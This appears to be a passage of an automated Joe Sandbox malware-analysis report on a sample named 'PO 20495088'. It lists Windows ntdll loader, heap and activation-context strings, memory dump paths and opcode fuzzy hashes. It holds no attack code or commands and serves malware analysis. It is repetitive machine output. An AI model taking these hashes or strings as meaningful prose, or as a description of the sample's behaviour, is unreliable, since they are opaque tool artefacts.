• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
• VerifierDebug, xrefs: 017A8CA5
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
• HandleTraces, xrefs: 017A8C8F
• VerifierDlls, xrefs: 017A8CBD
• AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
• VerifierFlags, xrefs: 017A8C50
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
• Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
• Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
• Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
• Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                        • API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
• LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
• apphelp.dll, xrefs: 01716496
• minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
• RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
• SXS: %s() passed the empty activation context, xrefs: 01792165
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
Strings
• Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
• minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
• LdrpInitializeProcess, xrefs: 0175C6C4
• LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
• minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
• Loading import redirection DLL: '%wZ', xrefs: 01798170
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
APIs
  • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
Strings
• LdrpInitializeProcess, xrefs: 01758422
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
• @, xrefs: 01758591
• minkernel\ntdll\ldrinit.c, xrefs: 01758421
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
Strings
• .Local, xrefs: 017528D8
• SXS: %s() passed the empty activation context, xrefs: 017921DE
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
Strings
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
• RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
Strings
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Strings
• LdrpDynamicShimModule, xrefs: 0178A998
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
• apphelp.dll, xrefs: 01742462
• minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
Memory Dump Source
• Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 01733255
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                        • HEAP: , xrefs: 01733264
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        • API String ID: 0-617086771
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        • API String ID: 0-1077428164
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                        • LdrpCheckModule, xrefs: 0178A117
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-161242083
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-1334570610
                                                                                                        Strings
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1783798831
                                                                                                        Strings
                                                                                                        • @, xrefs: 017DC1F1
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                        • PreferredUILanguages, xrefs: 017DC212
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-3154609507
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        Strings
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                        • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        Strings
                                                                                                        • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                        • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                        • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                        • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                        • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                        • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                        • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                        • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                        Strings
                                                                                                        • kLsE, xrefs: 01720540
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                        • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                        • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                        • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                        • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                        • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                        • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                        • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                        • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                        • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                        • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                                                                        • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                        • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                        • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                                        • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                        • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                        • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                                        • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                        • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                        • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                                                                        • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                        • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                        • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                                                                        • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                        • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        • Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                        • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                                                                                        • Opcode Fuzzy Hash: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                        • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                        • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                                                                                        • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                        • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                        • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                                                                                        • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                        • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
• Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
• Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
